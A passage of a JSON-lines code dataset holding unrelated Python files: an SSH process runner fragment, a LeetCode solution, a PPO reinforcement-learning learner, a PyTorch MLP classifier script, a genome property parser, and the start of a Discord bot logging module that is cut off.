-F {self.pidfile} && rm {self.pidfile}); fi', rcwd=self.rcwd)\n print(res)\n return res\n\n async def run(self):\n await self.stop()\n command = self.command\n if isinstance(command, list):\n command = ' '.join(command)\n command = f\"(({command}) & echo $! > {self.pidfile} &)\"\n res = await ssh(self.host, self.hostuser, command, rcwd=self.rcwd)\n print(res)\n return res\n\n","sub_path":"erund/platforms/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251621159","text":"# Given a string, find the first non-repeating character in it and return it's index. 
If it doesn't exist, return -1.\n#\n# Examples:\n#\n# s = \"leetcode\"\n# return 0.\n#\n# s = \"loveleetcode\",\n# return 2.\n# Note: You may assume the string contain only lowercase letters.\n\n\nclass Solution(object):\n def firstUniqChar(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n hmap = {}\n l = set([])\n for i in range(len(s)):\n if s[i] not in hmap:\n hmap[s[i]] = i\n l.add(i)\n elif hmap[s[i]] in l:\n l.remove(hmap[s[i]])\n if not l:\n return -1\n return min(l)\n\n# Note:\n# Keeping track of index of letters when they are first seen, removing them when we see them again\n# Minimum index is the result\n","sub_path":"LeetCode/387-E-FirstUniqueCharacterInAString.py","file_name":"387-E-FirstUniqueCharacterInAString.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614030158","text":"import numpy as np\n\nimport chainer\nimport chainer.links as L\nimport chainer.functions as F\nimport threading, random\n\nfrom myML.rl.model import PolicyValueModel, DisCreteSoftMaxPolicyValueModel\nfrom myML.rl.learner import AsyncLearner\n\n\nclass PPOLearner(AsyncLearner):\n def __init__(self, model: PolicyValueModel, optimizer: chainer.Optimizer, *, batch_size=32,\n num_train_per_episode=15, eps=0.2):\n super().__init__(model, optimizer, batch_size=batch_size)\n self.old_model = self.copy_model()\n self.num_train_per_episode = num_train_per_episode\n self.eps = eps\n\n def clear_buffer(self):\n self.train_buffer = []\n\n def push_train_buffer(self, state, action, reward):\n self.train_buffer.append((state, action, reward))\n\n def get_data_from_train_buffer(self):\n batch_size = self.batch_size if len(self.train_buffer) > self.batch_size else len(self.train_buffer)\n\n datas_index = random.sample(range(len(self.train_buffer)), batch_size)\n\n # rearange dates\n states = []\n actions = []\n advantages = []\n for index in datas_index:\n state, action, advantage = self.train_buffer[index]\n states.append(state)\n actions.append(action)\n advantages.append(advantage)\n\n states = np.array(states).astype(np.float32)\n actions = np.array(actions).astype(np.int32)\n advantages = np.array(advantages).astype(np.float32)\n return states, actions, advantages\n\n def update_model(self):\n # start minibatch learning\n for t in range(self.num_train_per_episode):\n # get learning data\n with self.lock:\n states, actions, advantages = self.get_data_from_train_buffer()\n # get policy and value\n policies, values = self.model(states)\n old_policies, _ = self.old_model(states)\n\n # calculate loss\n loss_v = F.squared_error(values, np.array(advantages).astype(np.float32))\n loss_ent = -policies.entropy()\n\n r = (policies.get_prob(actions) + 1.0e-10) / (old_policies.get_prob(actions) + 1.0e-10)\n loss_clip = (advantages - values.data) * F.minimum(r, F.clip(r, 1.0 - self.eps, 1.0 + self.eps))\n\n loss = F.mean(-loss_clip + loss_v * 0.2 + 0.01 * loss_ent)\n\n self.model.cleargrads()\n loss.backward()\n self.optimizer.update()\n # update old model\n self.old_model = self.copy_model()\n self.clear_buffer()\n\n\nclass PPO:\n def __init__(self, model: PolicyValueModel, make_env_func=None, *,\n lr=1e-3, batch_size=32, gamma=0.99, lam=0.95, t_max=8, clip_eps=0.2, num_episode=200,\n num_steps_per_episode=200,\n eps_start=0.4, eps_end=0.15, eps_steps=75000, num_train_per_episode=15):\n if make_env_func is None:\n raise Exception(\"set make_env_func:Callable\")\n self.make_env_func = make_env_func\n\n # share learner\n 
self.learner = PPOLearner(model, chainer.optimizers.RMSprop(lr=lr), batch_size=batch_size,\n num_train_per_episode=num_train_per_episode, eps=clip_eps)\n\n # setting\n self.eps_start = eps_start\n self.eps_end = eps_end\n self.eps_steps = eps_steps\n self.t_max = t_max\n self.gamma = gamma\n self.lam = lam\n self.num_episode = num_episode\n self.num_steps_per_episode = num_steps_per_episode\n\n # flag\n self.on_explore = False\n\n def async_explore(self, learner: PPOLearner, explorer_event: threading.Event, learner_event: threading.Event):\n # make env\n env = self.make_env_func()\n\n # individual model\n model = learner.copy_model()\n # wait updating model\n explorer_event.wait()\n explorer_event.clear()\n while self.on_explore:\n episode_reward = 0.0\n state = env.reset()\n sar_que = []\n for t in range(1, self.num_steps_per_episode):\n eps = max(self.eps_start - (self.eps_start - self.eps_end) * learner.step / self.eps_steps,\n self.eps_end)\n\n action = model.get_eps_greedy_action(state, eps)\n\n next_state, reward, done, _ = env.step(action)\n\n sar_que.append([state, action, reward])\n learner.step += 1\n episode_reward += reward\n\n if t % self.t_max == 0 or done:\n # calculate generalize advantage estimation\n # A_t=sum_{i=0}^{T-t}(gamma*lambda)^i * delta_{t+i}\n # delta_{t}:=gamma * V(s_{t+1}) + r_t - V(s_t)\n # lambda : [0,1]\n # in PPO, lambda=0.95\n\n # here calculate A_t + V(s_t)\n R = 0.0\n if not done:\n R += self.gamma * model.get_value([state]).data[0][0]\n\n for s, a, r in reversed(sar_que):\n R += r\n v = model.get_value([s])\n with learner.lock:\n learner.push_train_buffer(s, a, [R])\n R *= self.gamma * self.lam\n R += self.gamma * (1 - self.lam) * v.data[0][0]\n\n sar_que = []\n\n # start updateding model\n learner_event.set()\n\n # wait updating model\n explorer_event.wait()\n if self.on_explore:\n explorer_event.clear()\n # sync model\n model = learner.copy_model()\n\n if done:\n break\n state = next_state\n\n def start(self, num_explorer: int):\n # event to controll thread\n explorer_event = threading.Event()\n learner_events = [threading.Event() for i in range(num_explorer)]\n\n # evaluate env\n eval_env = self.make_env_func()\n explorers = [threading.Thread(target=self.async_explore, args=(self.learner, explorer_event, learner_events[i]))\n for i in range(num_explorer)]\n\n self.on_explore = True\n for explore in explorers:\n explore.start()\n\n for episode in range(self.num_episode):\n # restart explorer\n explorer_event.set()\n\n # wait explorer process\n for learner_event in learner_events:\n learner_event.wait()\n learner_event.clear()\n # start learner process\n self.learner.update_model()\n\n # evalurate\n model = self.learner.get_model()\n episode_reward = 0.0\n for e in range(2):\n s = eval_env.reset()\n for t in range(200):\n a = model.get_action(s)\n s, r, d, _ = eval_env.step(a)\n episode_reward += r\n if d:\n break\n episode_reward /= 2\n print(\"episode={}:score={}\".format(episode, episode_reward))\n\n self.on_explore = False\n explorer_event.set()\n for explore in explorers:\n explore.join()\n\n\nif __name__ == '__main__':\n import gym\n\n\n class myPVModel(DisCreteSoftMaxPolicyValueModel):\n def __init__(self, num_hidden: int, num_action: int):\n super().__init__(num_hidden, num_action)\n with self.init_scope():\n self.l1 = L.Linear(4, num_hidden)\n self.l2 = L.Linear(num_hidden, num_hidden)\n\n def __call__(self, x):\n x = np.array(x).astype(np.float32)\n h = F.relu(self.l1(x))\n h = F.relu(self.l2(h))\n return super().__call__(h)\n\n\n def 
make_env():\n return gym.make(\"CartPole-v0\")\n\n\n a = PPO(myPVModel(10, 2), make_env, lr=5e-3)\n a.start(8)\n","sub_path":"myML/rl/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55258882","text":"# import needed libraries\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import WeightedRandomSampler, DataLoader, TensorDataset\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom hyper_params import HyperParams\nfrom tqdm import tqdm\n\n# create params object\nparams = HyperParams()\n# set PyTorch device\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Create Loaders\ndef create_loaders(dataset, num_y, batch_size, balance = True):\n # split the data into train, validation, and test sets\n if num_y == 1:\n x_train, x_test, y_train, y_test = train_test_split(dataset[:,:-num_y], dataset[:,-num_y], test_size=params.test_set_fraction)\n else:\n x_train, x_test, y_train, y_test = train_test_split(dataset[:,:-num_y], dataset[:,-num_y:], test_size=params.test_set_fraction)\n x_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train, test_size=params.validation_set_fraction / (params.validation_set_fraction + params.train_set_fraction))\n \n # convert the NumPy arrays into Pytorch tensors\n x_train = torch.from_numpy(x_train).type(torch.float)\n x_val = torch.from_numpy(x_val).type(torch.float)\n x_test = torch.from_numpy(x_test).type(torch.float)\n y_train = torch.from_numpy(y_train).type(torch.float)\n y_val = torch.from_numpy(y_val).type(torch.float)\n y_test = torch.from_numpy(y_test).type(torch.float)\n \n # Create datasets from the tensors\n train_dataset = TensorDataset(x_train, y_train)\n val_dataset = TensorDataset(x_val, y_val)\n test_dataset = TensorDataset(x_test, y_test)\n \n if balance:\n class_sample_count = np.unique(y_train, return_counts=True)[1]\n weight = 1. 
/ class_sample_count\n samples_weight = weight[y_train.type(torch.int8)]\n\n samples_weight = torch.from_numpy(samples_weight)\n sampler = WeightedRandomSampler(samples_weight, len(samples_weight))\n\n train_loader = DataLoader(train_dataset, batch_size, sampler=sampler)\n else:\n train_loader = DataLoader(train_dataset, batch_size, shuffle=True)\n \n val_loader = DataLoader(val_dataset, batch_size)\n test_loader = DataLoader(test_dataset, batch_size)\n \n return train_loader, val_loader, test_loader\n\n# create MLP model class with 2 hidden layers, relu activation, and sigmoid output activation\nclass MLP(nn.Module):\n def __init__(self, nodes, p, num_in, num_out, multilabel):\n super(MLP, self).__init__()\n self.nodes = nodes\n self.p = p\n self.input_nodes = num_in\n self.output_nodes = num_out\n self.multilabel = multilabel\n if len(self.nodes) == 2:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n elif len(self.nodes) == 4:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.nodes[2])\n self.dropout3 = nn.Dropout(p = self.p)\n self.bn3 = nn.BatchNorm1d(self.nodes[2])\n self.fc4 = nn.Linear(self.nodes[2], self.nodes[3])\n self.dropout4 = nn.Dropout(p = self.p)\n self.bn4 = nn.BatchNorm1d(self.nodes[3])\n self.fc5 = nn.Linear(self.nodes[3], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n elif len(self.nodes) == 6:\n self.fc1 = nn.Linear(self.input_nodes, self.nodes[0])\n self.dropout1 = nn.Dropout(p = self.p)\n self.bn1 = nn.BatchNorm1d(self.nodes[0])\n self.fc2 = nn.Linear(self.nodes[0], self.nodes[1])\n self.dropout2 = nn.Dropout(p = self.p)\n self.bn2 = nn.BatchNorm1d(self.nodes[1])\n self.fc3 = nn.Linear(self.nodes[1], self.nodes[2])\n self.dropout3 = nn.Dropout(p = self.p)\n self.bn3 = nn.BatchNorm1d(self.nodes[2])\n self.fc4 = nn.Linear(self.nodes[2], self.nodes[3])\n self.dropout4 = nn.Dropout(p = self.p)\n self.bn4 = nn.BatchNorm1d(self.nodes[3])\n self.fc5 = nn.Linear(self.nodes[3], self.nodes[4])\n self.dropout5 = nn.Dropout(p = self.p)\n self.bn5 = nn.BatchNorm1d(self.nodes[4])\n self.fc6 = nn.Linear(self.nodes[4], self.nodes[5])\n self.dropout6 = nn.Dropout(p = self.p)\n self.bn6 = nn.BatchNorm1d(self.nodes[5])\n self.fc7 = nn.Linear(self.nodes[5], self.output_nodes)\n if self.multilabel:\n self.out = nn.Sigmoid()\n else:\n raise\n\n def forward(self, x):\n if len(self.nodes) == 2:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n if self.multilabel:\n x = self.out(x)\n return x\n elif len(self.nodes) == 4:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n x = self.dropout3(x)\n x = nn.functional.elu(x)\n x = self.bn3(x)\n x = self.fc4(x)\n x = self.dropout4(x)\n x = 
nn.functional.elu(x)\n x = self.bn4(x)\n x = self.fc5(x)\n if self.multilabel:\n x = self.out(x)\n return x\n elif len(self.nodes) == 6:\n x = self.fc1(x)\n x = self.dropout1(x)\n x = nn.functional.elu(x)\n x = self.bn1(x)\n x = self.fc2(x)\n x = self.dropout2(x)\n x = nn.functional.elu(x)\n x = self.bn2(x)\n x = self.fc3(x)\n x = self.dropout3(x)\n x = nn.functional.elu(x)\n x = self.bn3(x)\n x = self.fc4(x)\n x = self.dropout4(x)\n x = nn.functional.elu(x)\n x = self.bn4(x)\n x = self.fc5(x)\n x = self.dropout5(x)\n x = nn.functional.elu(x)\n x = self.bn5(x)\n x = self.fc6(x)\n x = self.dropout6(x)\n x = nn.functional.elu(x)\n x = self.bn6(x)\n x = self.fc7(x)\n if self.multilabel:\n x = self.out(x)\n return x\n else:\n raise\n\ndef plot_loss(n_epochs, train_loss, val_loss, upper_y_lim):\n plt.plot(list(range(1, n_epochs+1)), train_loss, color='blue')\n plt.plot(list(range(1, n_epochs+1)), val_loss, color='orange')\n plt.ylim((0.0, upper_y_lim))\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Training (Blue) and Validation (Orange) Loss')\n plt.show()\n return\n\ndef classify(model, loader, multilabel):\n model.eval()\n y_true = torch.LongTensor()\n y_pred = torch.LongTensor()\n for data in loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n if multilabel:\n num_pos_labels = y_hat.shape[1] // 2\n y_hat = torch.max(y_hat[:,-num_pos_labels:], 1).values\n y = torch.max(y[:,-num_pos_labels:], 1).values\n else:\n y_hat = torch.sigmoid(y_hat)\n y_hat = y_hat.view(y_hat.shape[0])\n y_hat = torch.where(y_hat >= 0.5, torch.ones_like(y_hat), torch.zeros_like(y_hat))\n y_true = torch.cat((y_true, y.to('cpu').long()), dim=0)\n y_pred = torch.cat((y_pred, y_hat.to('cpu').long()), dim=0)\n return y_true, y_pred\n\ndef predict(model, loader, multilabel):\n model.eval()\n y_true = torch.FloatTensor()\n y_pred = torch.FloatTensor()\n for data in loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n if multilabel:\n num_pos_labels = y_hat.shape[1] // 2\n y_hat = torch.max(y_hat[:,-num_pos_labels:], 1).values\n y = torch.max(y[:,-num_pos_labels:], 1).values\n else:\n y_hat = torch.sigmoid(y_hat)\n y_hat = y_hat.view(y_hat.shape[0])\n y_true = torch.cat((y_true, y.to('cpu').float()), dim=0)\n y_pred = torch.cat((y_pred, y_hat.to('cpu').float()), dim=0)\n return y_true, y_pred\n\n# ROC_AUC curve\ndef plt_roc_auc_curve(model, loader, model_name, multilabel):\n # predict probabilities\n y_test, model_probs = predict(model, loader, multilabel)\n # convert from Torch to Numpy\n y_test, model_probs = y_test.detach().numpy(), model_probs.detach().numpy()\n # generate a no skill prediction (majority class)\n ns_probs = [0 for _ in range(len(y_test))]\n # calculate scores\n ns_auc = roc_auc_score(y_test, ns_probs)\n model_auc = roc_auc_score(y_test, model_probs)\n # summarize scores\n print('No Skill: ROC AUC=%.3f' % (ns_auc))\n print(model_name + ': ROC AUC=%.3f' % (model_auc))\n # calculate roc curves\n ns_fpr, ns_tpr, _ = roc_curve(y_test, ns_probs)\n model_fpr, model_tpr, _ = roc_curve(y_test, model_probs)\n # plot the roc curve for the model\n plt.plot(ns_fpr, ns_tpr, linestyle='--', label='No Skill')\n plt.plot(model_fpr, model_tpr, marker='.', label=model_name)\n # axis labels\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n # show the legend\n plt.legend()\n # show the plot\n plt.show()\n\ndef plt_precision_recall_curve(model, loader, model_name, multilabel):\n # predict probabilities\n y_test, model_probs = predict(model, 
loader, multilabel)\n # convert from Torch to Numpy\n y_test, model_probs = y_test.detach().numpy(), model_probs.detach().numpy()\n # predict class values\n _, y_pred = classify(model, loader, multilabel)\n # convert from Torch to Numpy\n y_pred = y_pred.detach().numpy()\n model_precision, model_recall, _ = precision_recall_curve(y_test, model_probs)\n model_f1, model_auc = f1_score(y_test, y_pred), auc(model_recall, model_precision)\n # summarize scores\n print(model_name + ': f1=%.3f auc=%.3f' % (model_f1, model_auc))\n # plot the precision-recall curves\n no_skill = len(y_test[y_test==1]) / len(y_test)\n plt.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')\n plt.plot(model_recall, model_precision, marker='.', label=model_name)\n # axis labels\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n # show the legend\n plt.legend()\n # show the plot\n plt.show()\n\ndef evaluate(model, test_loader, multilabel):\n # Prediction\n y_true, y_pred = classify(model, test_loader, multilabel)\n\n # Classification report (recall, preccision, f-score, accuracy)\n print(classification_report(y_true, y_pred, digits=4))\n print()\n tn, fp, fn, tp = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n print('TN:',tn, 'FP:',fp, 'FN:',fn, 'TP:',tp )\n\n # ROC_AUC curve\n model_name='MLP'\n print()\n plt_roc_auc_curve(model, test_loader, model_name, multilabel)\n # Precision_Recall curve\n print()\n plt_precision_recall_curve(model, test_loader, model_name, multilabel)\n return\n\n#-------------------------------------Binary-------------------------------------\ndef binary(dataset, n_epochs, nodes, batch_size = 32, upper_y_lim = 1, p = 0.5):\n train_loader, val_loader, test_loader = create_loaders(dataset, 1, batch_size, balance = True)\n\n # create a training function that will output the model and its metrics for given nodes\n def train(dataset, n_epochs, nodes, p):\n num_in = dataset.shape[1] - 1\n num_out = 1\n model = MLP(nodes, p, num_in, num_out, multilabel=False).to(device)\n criterion = nn.BCEWithLogitsLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n train_loss = []\n val_loss = []\n for epoch in tqdm(range(n_epochs)):\n train_loss_epoch = 0\n val_loss_epoch = 0\n model.train()\n for data in train_loader:\n x, y = data[0].to(device), data[1].to(device)\n optimizer.zero_grad()\n y_hat = model(x)\n y_hat = y_hat.view(y_hat.shape[0])\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n train_loss_epoch += loss.item()\n model.eval()\n for data in val_loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n y_hat = y_hat.view(y_hat.shape[0])\n loss = criterion(y_hat, y)\n val_loss_epoch += loss.item()\n train_loss.append(train_loss_epoch / len(train_loader))\n val_loss.append(val_loss_epoch / len(val_loader))\n return model, train_loss, val_loss\n\n model, train_loss, val_loss = train(dataset, n_epochs, nodes, p)\n plot_loss(n_epochs, train_loss, val_loss, upper_y_lim)\n evaluate(model, test_loader, multilabel = False)\n \n return model\n\n#-----------------------------------Mulitlabel-----------------------------------\ndef multilabel(dataset, num_y, n_epochs, nodes, batch_size = 32, upper_y_lim = 1, p = 0.5):\n train_loader, val_loader, test_loader = create_loaders(dataset, num_y, batch_size, balance = False)\n \n # create a training function that will output the model and its metrics for given nodes\n def train(dataset, num_y, n_epochs, nodes, p):\n num_in = dataset.shape[1] - num_y\n num_out = num_y\n model = MLP(nodes, p, 
num_in, num_out, multilabel=True).to(device)\n criterion = nn.BCELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n train_loss = []\n val_loss = []\n for epoch in tqdm(range(n_epochs)):\n train_loss_epoch = 0\n val_loss_epoch = 0\n model.train()\n for data in train_loader:\n x, y = data[0].to(device), data[1].to(device)\n optimizer.zero_grad()\n y_hat = model(x)\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n train_loss_epoch += loss.item()\n model.eval()\n for data in val_loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n loss = criterion(y_hat, y)\n val_loss_epoch += loss.item()\n train_loss.append(train_loss_epoch / len(train_loader))\n val_loss.append(val_loss_epoch / len(val_loader))\n return model, train_loss, val_loss\n \n model, train_loss, val_loss = train(dataset, num_y, n_epochs, nodes, p)\n plot_loss(n_epochs, train_loss, val_loss, upper_y_lim)\n evaluate(model, test_loader, multilabel = True)\n \n return model","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":15932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"413580606","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated by: Lee Bergstrand (2017)\n\nDescription: The genome property class.\n\"\"\"\nfrom modules.database_reference import parse_database_references\nfrom modules.literature_reference import parse_literature_references\nfrom modules.step import parse_steps\n\n\nclass GenomeProperty(object):\n \"\"\"\n Represents a EBI Interpro genome property. Each represents specific capabilities of an\n organism as proven by the presence of genes found in its genome.\n \"\"\"\n\n def __init__(self, accession_id, name, property_type, threshold=0,\n parent=None, references=None, databases=None, steps=None,\n public=False, description=None, private_notes=None):\n \"\"\"\n Creates a new GenomeProperty object.\n :param accession_id: The genome property accession (i.e. \"GenProp00286\").\n :param name: The name of the genome property.\n :param property_type: The type of genome property (ex. 
\"METAPATH\").\n :param threshold: Is a threshold that the number of required steps must exceed.\n :param parent: The parent genome property of the current genome property (parent accession or direct link).\n :param references: A list of reference objects which help support the existence of the property.\n :param databases: A list of database objects which represent database entries related to the property.\n :param steps: A list of step objects that are part of the property.\n :param public: Boolean detailing if the genome property should be public.\n :param description: A detailed description of the genome property.\n :param private_notes: Private notes about the property a potential problems with it.\n \"\"\"\n if steps is None:\n steps = []\n if databases is None:\n databases = []\n if references is None:\n references = []\n\n self.id = accession_id\n self.name = name\n self.type = property_type\n self.threshold = threshold\n self.references = references\n self.databases = databases\n self.parent = parent\n self.steps = steps\n self.public = public\n self.description = description\n self.private_notes = private_notes\n\n def __repr__(self):\n has_references = False\n has_steps = False\n has_databases = False\n\n if self.references:\n has_references = True\n\n if self.steps:\n has_steps = True\n\n if self.databases:\n has_databases = True\n\n repr_data = [str(self.id),\n 'Type: ' + str(self.type),\n 'Name: ' + str(self.name),\n 'Thresh: ' + str(self.threshold),\n 'References: ' + str(has_references),\n 'Databases: ' + str(self.type),\n 'Steps: ' + str(has_steps),\n 'Parent: ' + str(has_databases),\n 'Public: ' + str(self.public)]\n\n return ', '.join(repr_data)\n\n\ndef parse_genome_property(genome_property_record):\n \"\"\"\n Parses a single genome property from a genome property record.\n :param genome_property_record: A list of marker, content tuples representing genome property flat file lines.\n :return: A single genome property object.\n \"\"\"\n # A list of record markers related to the genome property.\n core_genome_property_markers = ('AC', 'DE', 'TP', 'TH', 'PN', 'CC', '**')\n gathered_core_genome_property_markers = {}\n\n reference_index = False\n database_index = False\n step_index = False\n\n current_index = 0\n for marker, content in genome_property_record:\n if marker == 'RN':\n if not reference_index:\n reference_index = current_index\n elif marker == 'DC':\n if not database_index:\n database_index = current_index\n elif marker == '--':\n step_index = current_index + 1\n break # If we have reach steps we have covered all core_genome_property_markers and can leave the loop.\n elif marker in core_genome_property_markers:\n if marker == 'TH':\n content = int(content)\n gathered_core_genome_property_markers[marker] = content\n\n current_index = current_index + 1\n\n if reference_index:\n if database_index:\n reference_rows = genome_property_record[reference_index:database_index]\n else:\n reference_rows = genome_property_record[reference_index:]\n\n references = parse_literature_references(reference_rows)\n else:\n references = []\n\n if database_index:\n if step_index:\n database_rows = genome_property_record[database_index:step_index - 1]\n else:\n database_rows = genome_property_record[database_index:]\n\n databases = parse_database_references(database_rows)\n else:\n databases = []\n\n if step_index:\n step_rows = genome_property_record[step_index:]\n steps = parse_steps(step_rows)\n else:\n steps = []\n\n new_genome_property = 
GenomeProperty(accession_id=gathered_core_genome_property_markers.get('AC'),\n name=gathered_core_genome_property_markers.get('DE'),\n property_type=gathered_core_genome_property_markers.get('TP'),\n threshold=gathered_core_genome_property_markers.get('TH'),\n parent=gathered_core_genome_property_markers.get('PN'),\n description=gathered_core_genome_property_markers.get('CC'),\n private_notes=gathered_core_genome_property_markers.get('**'),\n references=references,\n databases=databases,\n steps=steps)\n return new_genome_property\n","sub_path":"modules/genome_property.py","file_name":"genome_property.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533829111","text":"import asyncio\nimport io\nimport logging\nimport os\nimport sys\nimport traceback\nfrom collections import namedtuple\nfrom concurrent.futures import CancelledError\nfrom datetime import datetime\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nimport pytz\nimport sentry_sdk\nfrom aiohttp import ClientOSError, ServerDisconnectedError\nfrom discord import ConnectionClosed\nfrom discord.ext import commands\n\nfrom Bot import TheRealGearBot\nfrom Util import Configuration, Utils, MessageUtils\n\nLOGGER = logging.getLogger('gearbot')\nDISCORD_LOGGER = logging.getLogger('discord')\n\nBOT_LOG_CHANNEL: discord.TextChannel = None\nSTARTUP_ERRORS = []\nBOT: commands.AutoShardedBot = None\nLOG_PUMP = None\nLOG_ERRORS = 0\n\nlog_type = namedtuple(\"Log_type\", \"category emoji\")\nLOG_TYPES = {\n \"raid_new\": log_type('RAID_LOGS', 'BAD_USER'),\n \"raid_terminated\": log_type(\"RAID_LOGS\", 'INNOCENT'),\n 'censored_message': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'censor_message_failed': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'censored_invite': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'invite_censor_fail': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'invite_censor_forbidden': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'automod_ban_failed': log_type('MOD_ACTIONS', 'WARNING'),\n 'warning_added_modlog': log_type('MOD_ACTIONS', 'WARNING'),\n 'warning_could_not_dm': log_type('MOD_ACTIONS', 'WARNING'),\n 'inf_delete_log': log_type('MOD_ACTIONS', 'DELETE'),\n 'ban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'kick_log': log_type('MOD_ACTIONS', 'BOOT'),\n 'mute_role_already_removed': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmute_missing_perms': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmute_unknown_error': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmuted': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'tempban_expired_missing_perms': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_already_lifted': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_lifted': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'softban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'forceban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'mute_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_extended_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_added_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_overwritten_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_reapply_log': log_type('MOD_ACTIONS', 'BAD_USER'),\n 'mute_reapply_failed_log': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'unban_log': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'unmute_modlog': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'channel_update_simple': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'channel_update_simple_by': log_type('CHANNEL_CHANGES', 
'ALTER'),\n 'role_update_simple': log_type('ROLE_CHANGES', 'ALTER'),\n 'role_update_simple_by': log_type('ROLE_CHANGES', 'ALTER'),\n 'command_used': log_type('COMMAND_EXECUTED', 'WRENCH'),\n 'channel_created_by': log_type('ROLE_CHANGES', 'CREATE'),\n 'channel_created': log_type('ROLE_CHANGES', 'CREATE'),\n 'channel_deleted_by': log_type('channel_deleted_by', 'DELETE'),\n 'channel_deleted': log_type('channel_deleted_by', 'DELETE'),\n 'permission_override_update': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 